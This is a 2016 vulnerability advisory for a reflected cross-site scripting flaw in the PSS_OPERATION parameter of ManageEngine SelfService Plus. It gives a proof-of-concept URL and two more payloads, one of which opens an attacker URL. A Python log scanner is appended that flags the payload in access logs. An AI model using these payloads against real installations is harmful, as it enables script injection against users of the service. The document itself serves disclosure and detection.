ManageEngine SelfService Plus Cross Site Scripting
Posted on 06 June 2016
# Exploit Title: Reflected XSS in ManageEngine SelfService Plus - 0day - Confirmed
# Google Dork: N/A
# Date: 29/5/2016
# Exploit Author: Mohamed Saeed
# Contact: http://twitter.com/krmalab
# Website: http://www.dts-solution.com
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: >= ManageEngine SelfService Plus build 5312 (Mar 2016)
# Tested on: Affected browsers: All - Tested on Firefox 44.0.2.
# CVE : N/A (ManageEngine Not in CVE-ID Covered Products)
# Category: webapps

Reflected XSS:
=============
GET URL : http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock
Vulnerable Parameter : PSS_OPERATION

Exploit: http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock<button/onclick=alert(1)>DTS<>/button>

Notes:
=====
There is some filter mechanism in place. Not all XSS payloads will work.

Other XSS Payloads :
==================
0x00. "><img src=x onerror=window.open('EvilURL');>
0x01. <p/onmouseover=javascript:alert(1);>DTS</p>

References:
=========
0x00. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
0x01. https://www.owasp.org/index.php/XSS_Attacks

Solution:
========
Upgrade to latest version (build 5313)

About US:
=========
DTS Solution Research and Security labs provide latest security updates, research and development, tool-kits and whitepapers around cyber security.
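
Added example, not part of the original advisory and not ManageEngine or DTS code: a log check for the request described in this advisory. It flags requests to the advisory's endpoint whose PSS_OPERATION value, once decoded, is anything other than a plain token. The access-log format, the sample entries, and the premise that legitimate values are alphanumeric tokens like "unlock" are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter named in the advisory.
API_PATH = "/RestAPI/PasswordSelfServiceAPI"
PARAM = "PSS_OPERATION"
# Assumption: legitimate values are plain tokens such as "unlock".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]+")
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_values(log_line):
    """Return decoded PSS_OPERATION values in this entry that are not plain tokens."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # Case-insensitive compare so a differently-cased path is not missed.
    if url.path.lower() != API_PATH.lower():
        return []
    values = parse_qs(url.query).get(PARAM, [])
    # parse_qs percent-decodes once; decode again so double-encoded
    # markup is reported in readable form.
    decoded = (unquote(v) for v in values)
    return [v for v in decoded if not SAFE_VALUE.fullmatch(v)]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    return [(n, v) for n, line in enumerate(lines, 1)
            for v in suspicious_values(line)]

# Constructed sample entries (not real traffic). Entry 2 carries the
# advisory's own proof-of-concept value, percent-encoded as a browser sends it.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2016:10:01:02 +0000] "GET /RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock HTTP/1.1" 200 512',
    '192.0.2.44 - - [29/May/2016:10:03:44 +0000] "GET /RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock%3Cbutton/onclick=alert(1)%3EDTS%3C%3E/button%3E HTTP/1.1" 200 540',
    '192.0.2.44 - - [29/May/2016:10:04:10 +0000] "GET /index.html?PSS_OPERATION=%3Cb%3E HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: {PARAM}={v!r}")
```

Matching on an allow-list of expected values rather than on known payload strings keeps the check useful even where a server-side filter blocks only some payloads, as the Notes section describes.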